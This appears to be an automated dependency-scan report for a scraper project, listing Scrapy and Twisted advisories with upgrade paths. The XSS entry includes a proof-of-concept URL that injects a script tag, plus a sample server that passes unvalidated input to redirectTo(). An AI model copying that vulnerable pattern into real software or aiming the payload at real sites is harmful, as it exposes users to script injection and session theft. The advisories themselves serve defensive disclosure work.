  • Vulnerable module: scrapy
  • Introduced through: scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2
    Remediation: Upgrade to scrapy@1.8.3.

Overview

Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.

Affected versions of this package are vulnerable to Credential Exposure via the process_request() function in downloadermiddlewares/httpproxy.py. Credentials for one proxy can leak to another proxy if a third-party downloader middleware leaves the Proxy-Authorization header unchanged when updating proxy metadata for a new request.

NOTE: To fully mitigate the effects of the vulnerability, replacing or upgrading the third-party downloader middleware might be necessary after upgrading.
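
For projects that cannot immediately upgrade the third-party middleware, a hedged sketch of the defensive cleanup implied above; the middleware and proxy address are hypothetical:

class ProxySwitchMiddleware:
    """Hypothetical downloader middleware that assigns a proxy per request."""

    def process_request(self, request, spider):
        new_proxy = "http://other-proxy.example.com:8080"
        if request.meta.get("proxy") != new_proxy:
            # Drop credentials that belong to the previous proxy before
            # pointing the request at a different one.
            if "Proxy-Authorization" in request.headers:
                del request.headers["Proxy-Authorization"]
            request.meta["proxy"] = new_proxy
        return None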

Remediation

Upgrade Scrapy to version 1.8.3, 2.6.2 or higher.

References

medium severity

HTTP Response Smuggling

  • Vulnerable module: twisted
  • Introduced through: twisted@23.8.0 and scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a twisted@23.8.0
    Remediation: Upgrade to twisted@23.10.0.
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 twisted@23.8.0
    Remediation: Upgrade to scrapy@1.8.2.

Overview

Twisted is an event-based network programming and multi-protocol integration framework.

Affected versions of this package are vulnerable to HTTP Response Smuggling. When sending multiple HTTP/1.1 requests in one TCP segment, twisted.web does not guarantee the response order. An attacker in control of an endpoint can manipulate a different user's second response to a pipelined chunked request by delaying the response to their own request.

Workaround

This vulnerability can be avoided by enforcing HTTP/2, since only HTTP/1.x traffic is affected.

Remediation

Upgrade Twisted to version 23.10.0rc1 or higher.

References

medium severity

Denial of Service (DoS)

  • Vulnerable module: scrapy
  • Introduced through: scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2

Overview

Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.

Affected versions of this package are vulnerable to Denial of Service (DoS) via S3FilesStore. Files are stored in memory before being uploaded to S3, increasing memory usage if very large files, or many files, are uploaded at the same time.

References

medium severity

Cross-site Scripting (XSS)

  • Vulnerable module: twisted
  • Introduced through: twisted@23.8.0 and scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a twisted@23.8.0
    Remediation: Upgrade to twisted@24.7.0.
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 twisted@23.8.0
    Remediation: Upgrade to scrapy@1.8.2.

Overview

Twisted is an event-based network programming and multi-protocol integration framework.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) when the victim is using Firefox, due to an unescaped URL in the redirectTo() function. A site that is vulnerable to open redirects by other means can be made to execute scripts injected into a redirect URL.

PoC

http://127.0.0.1:9009?url=ws://example.com/"><script>alert(document.location)</script>
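
A hedged sketch of the server-side pattern behind that PoC URL; the resource is hypothetical, not Twisted's own code. It passes an unvalidated query parameter straight to redirectTo():

from twisted.internet import reactor
from twisted.web import resource, server
from twisted.web.util import redirectTo

class Redirector(resource.Resource):
    isLeaf = True

    def render_GET(self, request):
        # The 'url' query parameter is attacker-controlled; affected Twisted
        # versions echoed it into the generated redirect page without escaping.
        target = request.args.get(b"url", [b"/"])[0]
        return redirectTo(target, request)

reactor.listenTCP(9009, server.Site(Redirector()))
reactor.run()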

Details

A cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.
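
In Python, for example, the standard library's html.escape performs exactly this substitution:

import html

user_input = '"><script>alert(document.location)</script>'
print(html.escape(user_input))
# &quot;&gt;&lt;script&gt;alert(document.location)&lt;/script&gt;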

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

  • Stored (origin: server) - The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
  • Reflected (origin: server) - The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
  • DOM-based (origin: client) - The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
  • Mutated - The attacker injects code that appears safe, but is then rewritten and modified by the browser while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade Twisted to version 24.7.0rc1 or higher.

References

medium severity

URL Redirection to Untrusted Site ('Open Redirect')

  • Vulnerable module: scrapy
  • Introduced through: scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2
    Remediation: Upgrade to scrapy@2.11.2.

Overview

Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.

Affected versions of this package are vulnerable to URL Redirection to Untrusted Site ('Open Redirect') due to the improper handling of scheme-specific proxy settings during HTTP redirects. An attacker can potentially intercept sensitive information by exploiting the failure to switch proxies when redirected from HTTP to HTTPS URLs or vice versa.

Remediation

Upgrade Scrapy to version 2.11.2 or higher.

References

medium severity

MPL-2.0 license

  • Module: certifi
  • Introduced through: scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 tldextract@4.0.0 requests@2.31.0 certifi@2025.1.31
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 tldextract@4.0.0 requests-file@2.1.0 requests@2.31.0 certifi@2025.1.31

MPL-2.0 license